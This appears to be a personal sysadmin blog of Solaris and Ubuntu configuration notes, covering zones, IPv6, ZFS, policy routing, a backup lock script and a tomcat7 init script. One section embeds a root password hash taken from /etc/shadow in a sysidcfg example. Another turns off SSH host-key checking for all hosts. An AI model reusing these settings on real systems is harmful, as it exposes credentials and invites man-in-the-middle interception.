OpenBoot 4.30.4.e, 3968 MB memory available, Serial #82179994.
Ethernet address 0:14:4f:e5:f7:9a, Host ID: 84e5f79a.
Boot device: disk File and args:
ufs-file-system
Loading: /platform/SUNW,SPARC-Enterprise-T1000/boot_archive
ramdisk-root hsfs-file-system
Loading: /platform/SUNW,SPARC-Enterprise-T1000/kernel/sparcv9/unix
SunOS Release 5.10 Version Generic_150400-38 64-bit
Copyright (c) 1983, 2016, Oracle and/or its affiliates. All rights reserved.
os-io WARNING: failed to resolve 'scsa,probe' driver alias, defaulting to 'nulldriver'
WARNING: failed to resolve 'scsa,nodev' driver alias, defaulting to 'nulldriver'
Hostname: hostnix01
Configuring devices.
LDAP NIS domain name is
No panics. Yay!
#.
sc> showhost
SPARC-Enterprise-T1000 System Firmware 6.7.13 2013/09/24 08:10
Host flash versions:
OBP 4.30.4.e 2013/09/23 16:06
Hypervisor 1.7.3.d 2013/09/24 07:19
POST 4.30.4.b 2010/07/09 14:25
All is as it should be.
....
some of this was lifted from here:
https://www.arm-blog.com/installing-solaris-10-on-a-sunfire-v210-via-network/
Friday, September 16, 2016
Thursday, September 15, 2016
solaris 10 sysidcfg example
sometimes you get tired of pressing esc 2.
after you create your zone, plop this file in: /zonename/root/etc/sysidcfg
issue:
# zoneadm -z zonename boot
# zlogin -C zonename
and have a ball, y'all
system_locale=en_US
timezone=US/Eastern
terminal=vt100
timeserver=localhost
name_service=DNS {domain_name=nothere.com
name_server=10.6.7.8,10.6.7.9
search=nothere.com}
nfs4_domain=dynamic
root_password=nVgCm2Wm0wNVZ <---- from /etc/shadow, fool.
network_interface=primary {hostname=hostfromhades
default_route=10.6.6.1
ip_address=10.6.6.6
netmask=255.255.255.0
protocol_ipv6=yes}
security_policy=none
the fabled ipv6 sol 10 post
IPv6 in Shared-Stack Zones
By user12618912 on Oct 08, 2009
I was recently at an OpenSolaris user-group meeting where a question was asked regarding how IPv6 could be used from a shared-stack zone. For the benefit of anyone who has a similar question, here is an example of a working configuration:
bash-3.2# zoneadm list -iv
ID NAME STATUS PATH BRAND IP
0 global running / native shared
- test installed /export/home/test native excl
- test2 installed /export/home/test2 native shared
The exclusive-stack zone "test" has all of its own networking configured within it, so IPv6 inherently just works there. The question, however, was about shared-stack, and so I setup the "test2" zone to demonstrate this.
bash-3.2# zonecfg -z test2
zonecfg:test2> add net
zonecfg:test2:net> set physical=e1000g0
zonecfg:test2:net> set address=fe80::1234/10
zonecfg:test2:net> end
zonecfg:test2> add net
zonecfg:test2:net> set physical=e1000g0
zonecfg:test2:net> set address=2002:a08:39f0:1::1234/64
zonecfg:test2:net> end
zonecfg:test2> verify
zonecfg:test2> commit
zonecfg:test2> exit
bash-3.2# zonecfg -z test2 info
zonename: test2
zonepath: /export/home/test2
brand: native
...
net:
address: 10.8.57.111/24
physical: e1000g0
defrouter not specified
net:
address: fe80::1234/10
physical: e1000g0
defrouter not specified
net:
address: 2002:a08:39f0:1::1234/64
physical: e1000g0
defrouter not specified
Here I configured a link-local address fe80::1234/10, and a global address 2002:a08:39f0:1::1234/64. Each interface within each zone requires a link-local address for use with neighbor-discovery, and the global address is the address used for actual IPv6 communication by applications and services. The global address' prefix is one that is configured on the link to which the interface is connected. In the zone, we end up with:
bash-3.2# zlogin test2 ifconfig -a6
lo0:1: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1
inet6 ::1/128
e1000g0:2: flags=2000841<UP,RUNNING,MULTICAST,IPv6> mtu 1500 index 2
inet6 fe80::1234/10
e1000g0:3: flags=2000841<UP,RUNNING,MULTICAST,IPv6> mtu 1500 index 2
inet6 2002:a08:39f0:1::1234/64
The global zone has IPv6 connectivity using this same prefix as well as a default IPv6 route: [2]
bash-3.2# netstat -f inet6 -rn
Routing Table: IPv6
Destination/Mask Gateway Flags Ref Use If
--------------------------- --------------------------- ----- --- ------- -----
2002:a08:39f0:1::/64 2002:a08:39f0:1:214:4fff:fe1e:1e72 U 1 0 e1000g0:1
fe80::/10 fe80::214:4fff:fe1e:1e72 U 1 0 e1000g0
default fe80::1 UG 1 0 e1000g0
::1 ::1 UH 1 21 lo0
From the non-global zone, we have IPv6 connectivity:
bash-3.2# zlogin test2 ping -sn 2002:8194:aeaa:1:214:4fff:fe70:5530
PING 2002:8194:aeaa:1:214:4fff:fe70:5530 (2002:8194:aeaa:1:214:4fff:fe70:5530): 56 data bytes
64 bytes from 2002:8194:aeaa:1:214:4fff:fe70:5530: icmp_seq=0. time=4.654 ms
64 bytes from 2002:8194:aeaa:1:214:4fff:fe70:5530: icmp_seq=1. time=2.632 ms
64 bytes from 2002:8194:aeaa:1:214:4fff:fe70:5530: icmp_seq=2. time=2.501 ms
64 bytes from 2002:8194:aeaa:1:214:4fff:fe70:5530: icmp_seq=3. time=2.571 ms
\^C
----2002:8194:aeaa:1:214:4fff:fe70:5530 PING Statistics----
4 packets transmitted, 4 packets received, 0% packet loss
round-trip (ms) min/avg/max/stddev = 2.501/3.090/4.654/1.044
enable ipv6 on solaris10 afterthefact
effing oracle.
you have this:
# ifconfig inet6 interface plumb up
which in my case is:
# ifconfig inet6 igb0 plumb up
and it spits out:
ifconfig: igb0: bad address (try again later)
no. your doc writers are jerks. here's what it should look like:
root@host:~$ ifconfig igb0 inet6 plumb
root@host:~$ ifconfig igb0 inet6 token ::10/64
root@host:~$ svcadm enable svc:/network/routing/ndp:default
root@host:~$ pkill -HUP in.ndpd
root@host:~$ ifconfig -a6
igb0: flags=2000840<RUNNING,MULTICAST,IPv6> mtu 1500 index 2
inet6 fe80::210:e0ff:fe0c:ea9a/10
ether 0:10:e0:c:ea:9a
make it permanent.
root@host:~$ vi /etc/hostname6.igb0
hostname
addif fe80:0000:0000:210:e0ff:fe0c:ea9a/10 up
* note: each :: expands to a run of :0000: groups
oracle, eat a bug. eat a lot.
Thursday, August 18, 2016
let's restart solaris 10 sshd
To check if the service is online or offline:
# svcs -v ssh
online - 12:23:17 115 svc:/network/ssh:default
To stop the service:
#svcadm disable network/ssh
To start the service:
#svcadm enable network/ssh
To restart the service:
# svcadm restart network/ssh
Friday, August 12, 2016
manual jre 8u102 installation on sol10 sparc
gzip -dc jdk-8u102-solaris-sparcv9.tar.gz | tar xf -
mv /opt/jdk1.8.0_102 /usr/jdk/instances/jdk1.8.0
cd /usr/jdk
# ls -la
lrwxrwxrwx 1 root other 7 Jun 8 14:37 j2sdk1.4.2_26 -> ../j2se
lrwxrwxrwx 1 root other 18 Aug 11 11:55 jdk1.5.0_85 -> instances/jdk1.5.0
lrwxrwxrwx 1 root other 18 Aug 11 15:38 jdk1.6.0_121 -> instances/jdk1.6.0
lrwxrwxrwx 1 root other 12 Aug 11 15:38 latest -> jdk1.6.0_121
# ln -s instances/jdk1.8.0 jdk1.8_102
# mv latest latest.orig
# ln -s jdk1.8_102 latest
# cd /usr
# ls -la |grep java
lrwxrwxrwx 1 root other 16 Aug 11 15:38 java -> jdk/jdk1.6.0_121
# mv java java.orig
# ln -s jdk/jdk1.8_102 java
Tuesday, August 9, 2016
ufs to zfs on solaris10
grumble my second drive i've dedicated to solaris zones
has run out of inodes because it is ufs and not zfs. okay.
# nano -w /etc/vfstab
remove second drive definition; e.g. c2t3C76E3E06C7010BCd0
# umount /zones
# format -e
format
select the second drive. go home.
# zpool list
# zpool create zones c2t3C76E3E06C7010BCd0
# zpool status
# mount |grep zones
# cd /zones
# df -k
zones 1147797504 21 1147797432 1% /zones
that looks like 1T yeah?
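quick arithmetic on that df -k figure (the column is KB, so divide by 1024^3 for TiB):

```shell
# 1147797504 KB / 1024^3 = TiB
awk 'BEGIN{printf "%.2f TiB\n", 1147797504/1024^3}'
# -> 1.07 TiB
```

so yes, that is the 1T pool.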
# dd if=/dev/zero bs=128k count=40000 of=/zones/bigfile
40000+0 records in
40000+0 records out
# ls -la
total 9250396
drwxr-xr-x 2 root root 3 Aug 8 10:13 .
drwxr-xr-x 25 root root 512 Aug 3 17:08 ..
-rw-r--r-- 1 root root 5242880000 Aug 8 10:13 bigfile
# zpool list
NAME SIZE ALLOC FREE CAP HEALTH ALTROOT
zones 1.09T 4.88G 1.08T 0% ONLINE -
yay.
Monday, August 8, 2016
let's make ssh like telnet
let's make ssh like telnet
me@here:~$ ssh root@there
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
51:e3:4a:61:06:6b:52:04:c1:69:4f:36:47:4e:d6:dc.
Please contact your system administrator.
Add correct host key in known_hosts to get rid of this message.
i am the effing systems administrator. and yeah, i reinstalled the host.
# vi ~/.ssh/config
Host *
StrictHostKeyChecking no
UserKnownHostsFile=/dev/null
and now i'm pretty much flying blind. weeeee
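a slightly less blind compromise is to scope the override to just the lab hosts instead of `Host *` (the patterns below are illustrative, swap in your own):

```
Host 10.97.136.* *.lab.example
StrictHostKeyChecking no
UserKnownHostsFile=/dev/null
```

or, for a single reinstalled host, `ssh-keygen -R there` removes just the stale key from known_hosts.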
Tuesday, June 14, 2016
remove duplicate crap from bind9 zone files
cat -n db.zone | sort -k 2 | uniq -f 1 | sort -n | cut -f 2- > db.zone.uniq
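the same pipeline rehearsed on throwaway data (the records are made up): number the lines, sort by content, drop duplicates while ignoring the line number, restore the original order, strip the numbers.

```shell
#!/bin/sh
printf 'www IN A 10.0.0.1\nmail IN A 10.0.0.2\nwww IN A 10.0.0.1\n' > /tmp/db.demo
# cat -n tags each line with its position so the final sort -n can
# restore the original order after the content-sorted dedup
cat -n /tmp/db.demo | sort -k 2 | uniq -f 1 | sort -n | cut -f 2- > /tmp/db.demo.uniq
cat /tmp/db.demo.uniq
rm -f /tmp/db.demo /tmp/db.demo.uniq
```

only the first copy of each duplicate record survives and ordering is preserved, which matters in zone files where the $TTL and SOA lines need to stay on top.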
Monday, June 6, 2016
two interfaces two networks
We will assume that we have two interfaces: eth0 and eth1. The two networks that should be used
are 10.97.136.0/24 and 192.168.5.0/24 .
The first IP address in each respective network is the gateway. Here's how to set things up in
ubuntu to use two interfaces on two networks:
...
/etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0
iface eth0 inet static
address 10.97.136.83
netmask 255.255.255.0
network 10.97.136.0
broadcast 10.97.136.255
gateway 10.97.136.1
# dns-* options are implemented by the resolvconf package, if installed
dns-nameservers 10.97.136.24 10.97.136.21
dns-search blah.com
auto eth1
iface eth1 inet static
address 192.168.5.55
netmask 255.255.255.0
network 192.168.5.0
...
Add a second kernel routing table
To add a new routing table, edit the file, /etc/iproute2/rt_tables .
The routing table for eth1 will be “rt2”, with preference 1.
...
/etc/iproute2/rt_tables
#
# reserved values
#
255 local
254 main
253 default
0 unspec
#
# local
#
#1 inr.ruhep
1 rt2
...
Configure rt2 routing table
# ip route add 192.168.5.0/24 dev eth1 src 192.168.5.55 table rt2
# ip route add default via 192.168.5.1 dev eth1 table rt2
The first command says that the network 192.168.5.0/24 can be reached through the eth1 interface.
The second command sets the default gateway for the rt2 table (even if the main table has none).
Configure two rules
# ip rule add from 192.168.5.55/32 table rt2
# ip rule add to 192.168.5.55/32 table rt2
These rules say that traffic from the IP address 192.168.5.55, as well as traffic
directed to it, should use the rt2 routing table.
Making the Configuration permanent
The ip rule and ip route commands do not survive a reboot, so they should be put in a script
(for example, /etc/rc.local) that runs once the network has come up. In ubuntu, these commands
can also be written directly into the /etc/network/interfaces file :
...
auto eth1
iface eth1 inet static
address 192.168.5.55
netmask 255.255.255.0
network 192.168.5.0
post-up ip route add 192.168.5.0/24 dev eth1 src 192.168.5.55 table rt2
post-up ip route add default via 192.168.5.1 dev eth1 table rt2
post-up ip rule add from 192.168.5.55/32 table rt2
post-up ip rule add to 192.168.5.55/32 table rt2
...
If there are more than two networks, create a routing table for each additional network analogous to the
above, incrementing the table number by one each time.
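as an illustration, a hypothetical third interface eth2 on 172.16.0.0/24 (addresses made up) would get its own table — say a `2 rt3` line in /etc/iproute2/rt_tables — and an interfaces stanza like:

```
auto eth2
iface eth2 inet static
address 172.16.0.55
netmask 255.255.255.0
network 172.16.0.0
post-up ip route add 172.16.0.0/24 dev eth2 src 172.16.0.55 table rt3
post-up ip route add default via 172.16.0.1 dev eth2 table rt3
post-up ip rule add from 172.16.0.55/32 table rt3
post-up ip rule add to 172.16.0.55/32 table rt3
```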
Testing the Configuration
The following commands can be used to ensure that the rules as well as the routing entries are working as expected.
# ip route list table rt2
default via 192.168.5.1 dev eth1
192.168.5.0/24 dev eth1 scope link src 192.168.5.55
# ip rule show
0: from all lookup local
32764: from all to 192.168.5.55 lookup rt2
32765: from 192.168.5.55 lookup rt2
32766: from all lookup main
32767: from all lookup default
pip pip!
time. it is all about time.
w32tm /config /manualpeerlist:"time.server,0x1 time.server2,0x1"
net stop w32time && net start w32time
w32tm /query /status
w32tm /resync /nowait
Wednesday, April 27, 2016
pids and cronjobs and scripts stomping on each other
i am backing up a whole lot of data via a cronjob.
sometimes it takes a really long time. like so long
that it bleeds over into the next backup cycle. this will
help me not run stuff in parallel. yuck. processes
stomping all over themselves is no fun.
this script records its PID (process id) in a standard place.
if the PID file is present and that process is still running, the script halts.
if not, the script (re)creates the PID file
and continues along working.
but, if it cannot create the file, the script dies.
#!/bin/bash
PIDFILE=/var/run/script_name.pid
if [ -f $PIDFILE ]
then
PID=$(cat $PIDFILE)
ps -p $PID > /dev/null 2>&1
if [ $? -eq 0 ]
then
echo "process already running"
echo "process already running" | mail -s "backup already running" me@here.org # -s takes a subject, then the recipient
exit 1
else
echo $$ > $PIDFILE
if [ $? -ne 0 ]
then
echo "could not create PID file"
exit 1
fi
fi
else
echo $$ > $PIDFILE
if [ $? -ne 0 ]
then
echo "could not create PID file"
exit 1
fi
fi
# work work work
# remove PID file
rm -f $PIDFILE
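for what it's worth, util-linux flock(1) does the same dance in one move and the kernel drops the lock when the process dies, so there's no stale-PID cleanup. a minimal sketch (lock file path is arbitrary):

```shell
#!/bin/bash
# open a file descriptor on the lock file, then take a non-blocking
# exclusive lock; it is released automatically when the script exits
exec 9> /tmp/script_name.lock
if ! flock -n 9; then
    echo "process already running"
    exit 1
fi
echo "got the lock"
# work work work
```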
Monday, April 11, 2016
solaris 11 studio 12.3 is a pain to install on zones
like for serious.
sol studio needs a cert. 30 days
pkg set-publisher -k /root/certs/pkg.oracle.com.key.pem -c /root/certs/pkg.oracle.com.certificate.pem -G "*" -g https://pkg.oracle.com/solarisstudio/release solarisstudio
well. sharing sunstudio12.3 between the host and paravirtualized system is a no go. awesome.
/etc/zones/zone1.xml has:
<filesystem special="/opt/solarisstudio12.3" directory="/opt/solarisstudio12.3" type="lofs"/>
let's get rid of it:
# zonecfg -z zone1 remove fs dir=/opt/solarisstudio12.3
Tuesday, February 23, 2016
tomcat7 startup for pwm
/etc/init.d/tomcat7
#!/bin/sh
#
# /etc/init.d/tomcat7 -- startup script for the Tomcat 7 servlet engine
#
# Written by Miquel van Smoorenburg <miquels@cistron.nl>.
# Modified for Debian GNU/Linux by Ian Murdock <imurdock@gnu.ai.mit.edu>.
# Modified for Tomcat by Stefan Gybas <sgybas@debian.org>.
# Modified for Tomcat6 by Thierry Carrez <thierry.carrez@ubuntu.com>.
# Modified for Tomcat7 by Ernesto Hernandez-Novich <emhn@itverx.com.ve>.
# Additional improvements by Jason Brittain <jason.brittain@mulesoft.com>.
#
### BEGIN INIT INFO
# Provides: tomcat7
# Required-Start: $local_fs $remote_fs $network
# Required-Stop: $local_fs $remote_fs $network
# Should-Start: $named
# Should-Stop: $named
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start Tomcat.
# Description: Start the Tomcat servlet engine.
### END INIT INFO
set -e
PATH=/bin:/usr/bin:/sbin:/usr/sbin
NAME=tomcat7
DESC="Tomcat servlet engine"
DEFAULT=/etc/default/$NAME
JVM_TMP=/tmp/tomcat7-$NAME-tmp
if [ `id -u` -ne 0 ]; then
echo "You need root privileges to run this script"
exit 1
fi
# Make sure tomcat is started with system locale
if [ -r /etc/default/locale ]; then
. /etc/default/locale
export LANG
fi
. /lib/lsb/init-functions
if [ -r /etc/default/rcS ]; then
. /etc/default/rcS
fi
# The following variables can be overwritten in $DEFAULT
# Run Tomcat 7 as this user ID and group ID
TOMCAT7_USER=tomcat7
TOMCAT7_GROUP=tomcat7
# this is a work-around until there is a suitable runtime replacement
# for dpkg-architecture for arch:all packages
# this function sets the variable OPENJDKS
find_openjdks()
{
for jvmdir in /usr/lib/jvm/java-7-openjdk-*
do
if [ -d "${jvmdir}" -a "${jvmdir}" != "/usr/lib/jvm/java-7-openjdk-common" ]
then
OPENJDKS=$jvmdir
fi
done
for jvmdir in /usr/lib/jvm/java-6-openjdk-*
do
if [ -d "${jvmdir}" -a "${jvmdir}" != "/usr/lib/jvm/java-6-openjdk-common" ]
then
OPENJDKS="${OPENJDKS} ${jvmdir}"
fi
done
}
OPENJDKS=""
find_openjdks
# The first existing directory is used for JAVA_HOME (if JAVA_HOME is not
# defined in $DEFAULT)
JDK_DIRS="/usr/lib/jvm/default-java ${OPENJDKS} /usr/lib/jvm/java-6-openjdk /usr/lib/jvm/java-6-sun"
# Look for the right JVM to use
for jdir in $JDK_DIRS; do
if [ -r "$jdir/bin/java" -a -z "${JAVA_HOME}" ]; then
JAVA_HOME="$jdir"
fi
done
export JAVA_HOME
# Directory where the Tomcat 7 binary distribution resides
CATALINA_HOME=/usr/share/$NAME
# Directory for per-instance configuration files and webapps
CATALINA_BASE=/var/lib/$NAME
# Use the Java security manager? (yes/no)
TOMCAT7_SECURITY=no
# Default Java options
# Set java.awt.headless=true if JAVA_OPTS is not set so the
# Xalan XSL transformer can work without X11 display on JDK 1.4+
# It also looks like the default heap size of 64M is not enough for most cases
# so the maximum heap size is set to 128M
if [ -z "$JAVA_OPTS" ]; then
JAVA_OPTS="-Djava.awt.headless=true -Xmx128M"
fi
# End of variables that can be overwritten in $DEFAULT
# overwrite settings from default file
if [ -f "$DEFAULT" ]; then
. "$DEFAULT"
fi
if [ ! -f "$CATALINA_HOME/bin/bootstrap.jar" ]; then
log_failure_msg "$NAME is not installed"
exit 1
fi
POLICY_CACHE="$CATALINA_BASE/work/catalina.policy"
if [ -z "$CATALINA_TMPDIR" ]; then
CATALINA_TMPDIR="$JVM_TMP"
fi
# Set the JSP compiler if set in the tomcat7.default file
if [ -n "$JSP_COMPILER" ]; then
JAVA_OPTS="$JAVA_OPTS -Dbuild.compiler=\"$JSP_COMPILER\""
fi
SECURITY=""
if [ "$TOMCAT7_SECURITY" = "yes" ]; then
SECURITY="-security"
fi
# Define other required variables
CATALINA_PID="/var/run/$NAME.pid"
CATALINA_SH="$CATALINA_HOME/bin/catalina.sh"
# Look for Java Secure Sockets Extension (JSSE) JARs
if [ -z "${JSSE_HOME}" -a -r "${JAVA_HOME}/jre/lib/jsse.jar" ]; then
JSSE_HOME="${JAVA_HOME}/jre/"
fi
catalina_sh() {
# Escape any double quotes in the value of JAVA_OPTS
JAVA_OPTS="$(echo $JAVA_OPTS | sed 's/\"/\\\"/g')"
AUTHBIND_COMMAND=""
if [ "$AUTHBIND" = "yes" -a "$1" = "start" ]; then
JAVA_OPTS="$JAVA_OPTS -Djava.net.preferIPv4Stack=true"
AUTHBIND_COMMAND="/usr/bin/authbind --deep /bin/bash -c "
fi
# Define the command to run Tomcat's catalina.sh as a daemon
# set -a tells sh to export assigned variables to spawned shells.
TOMCAT_SH="set -a; JAVA_HOME=\"$JAVA_HOME\"; source \"$DEFAULT\"; \
CATALINA_HOME=\"$CATALINA_HOME\"; \
CATALINA_BASE=\"$CATALINA_BASE\"; \
JAVA_OPTS=\"$JAVA_OPTS\"; \
CATALINA_PID=\"$CATALINA_PID\"; \
CATALINA_TMPDIR=\"$CATALINA_TMPDIR\"; \
LANG=\"$LANG\"; JSSE_HOME=\"$JSSE_HOME\"; \
cd \"$CATALINA_BASE\"; \
\"$CATALINA_SH\" $@"
if [ "$AUTHBIND" = "yes" -a "$1" = "start" ]; then
TOMCAT_SH="'$TOMCAT_SH'"
fi
# Run the catalina.sh script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
start-stop-daemon --start -b -u "$TOMCAT7_USER" -g "$TOMCAT7_GROUP" \
-c "$TOMCAT7_USER" -d "$CATALINA_TMPDIR" -p "$CATALINA_PID" \
-x /bin/bash -- -c "$AUTHBIND_COMMAND $TOMCAT_SH"
status="$?"
set +a -e
return $status
}
case "$1" in
start)
if [ -z "$JAVA_HOME" ]; then
log_failure_msg "no JDK found - please set JAVA_HOME"
exit 1
fi
if [ ! -d "$CATALINA_BASE/conf" ]; then
log_failure_msg "invalid CATALINA_BASE: $CATALINA_BASE"
exit 1
fi
log_daemon_msg "Starting $DESC" "$NAME"
if start-stop-daemon --test --start --pidfile "$CATALINA_PID" \
--user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \
>/dev/null; then
# Regenerate POLICY_CACHE file
umask 022
echo "// AUTO-GENERATED FILE from /etc/tomcat7/policy.d/" \
> "$POLICY_CACHE"
echo "" >> "$POLICY_CACHE"
cat $CATALINA_BASE/conf/policy.d/*.policy \
>> "$POLICY_CACHE"
# Remove / recreate JVM_TMP directory
rm -rf "$JVM_TMP"
mkdir -p "$JVM_TMP" || {
log_failure_msg "could not create JVM temporary directory"
exit 1
}
chown $TOMCAT7_USER "$JVM_TMP"
catalina_sh start $SECURITY
sleep 5
if start-stop-daemon --test --start --pidfile "$CATALINA_PID" \
--user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \
>/dev/null; then
if [ -f "$CATALINA_PID" ]; then
rm -f "$CATALINA_PID"
fi
log_end_msg 1
else
log_end_msg 0
fi
else
log_progress_msg "(already running)"
log_end_msg 0
fi
;;
stop)
log_daemon_msg "Stopping $DESC" "$NAME"
set +e
if [ -f "$CATALINA_PID" ]; then
start-stop-daemon --stop --pidfile "$CATALINA_PID" \
--user "$TOMCAT7_USER" \
--retry=TERM/20/KILL/5 >/dev/null
status=$?
if [ $status -eq 1 ]; then
log_progress_msg "$DESC is not running but pid file exists, cleaning up"
elif [ $status -eq 3 ]; then
PID="`cat $CATALINA_PID`"
log_failure_msg "Failed to stop $NAME (pid $PID)"
exit 1
fi
rm -f "$CATALINA_PID"
rm -rf "$JVM_TMP"
else
log_progress_msg "(not running)"
fi
log_end_msg 0
set -e
;;
status)
set +e
start-stop-daemon --test --start --pidfile "$CATALINA_PID" \
--user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \
>/dev/null 2>&1
if [ "$?" = "0" ]; then
if [ -f "$CATALINA_PID" ]; then
log_success_msg "$DESC is not running, but pid file exists."
exit 1
else
log_success_msg "$DESC is not running."
exit 3
fi
else
log_success_msg "$DESC is running with pid `cat $CATALINA_PID`"
fi
set -e
;;
restart|force-reload)
if [ -f "$CATALINA_PID" ]; then
$0 stop
sleep 1
fi
$0 start
;;
try-restart)
if start-stop-daemon --test --start --pidfile "$CATALINA_PID" \
--user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \
>/dev/null; then
$0 start
fi
;;
*)
log_success_msg "Usage: $0 {start|stop|restart|try-restart|force-reload|status}"
exit 1
;;
esac
exit 0